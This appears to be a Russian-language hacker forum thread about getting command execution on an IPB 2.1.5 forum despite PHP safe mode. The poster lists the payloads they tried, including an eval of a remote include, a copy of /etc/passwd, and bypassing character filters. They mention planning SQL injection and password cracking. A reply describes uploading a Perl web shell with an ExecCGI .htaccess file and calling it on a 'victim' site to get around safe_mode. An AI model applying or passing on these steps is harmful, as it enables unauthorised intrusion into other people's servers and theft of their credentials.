Прошу совета - есть в наличии 2.1.5 IPB форум.
Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE.
Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <======
в созданном посте.
Пробовал:
eval (include(http://lalalal));//'
Пробовал eval(file_get_contents());//'
Пробовал
copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");
Пробовал обходить фильтрацию при помощи &#NN;
но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы.
Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете?
У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5
В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.
Попробуй следующим образом.
Находим директорию в которую можно писать и доступную по ввв.
Создаем там файл .htaccess со строчкой Options +ExecCGI внутри.
Заливаем шелл туда же какойнить перловый шелл.
Далее делаем ему chmod +x shell.cgi
Потом пытаемся вызвать его из броузера.
hxxt://victim.com/blablabla/shell.cgi
У меня получалось обойти safe_mode таким способом.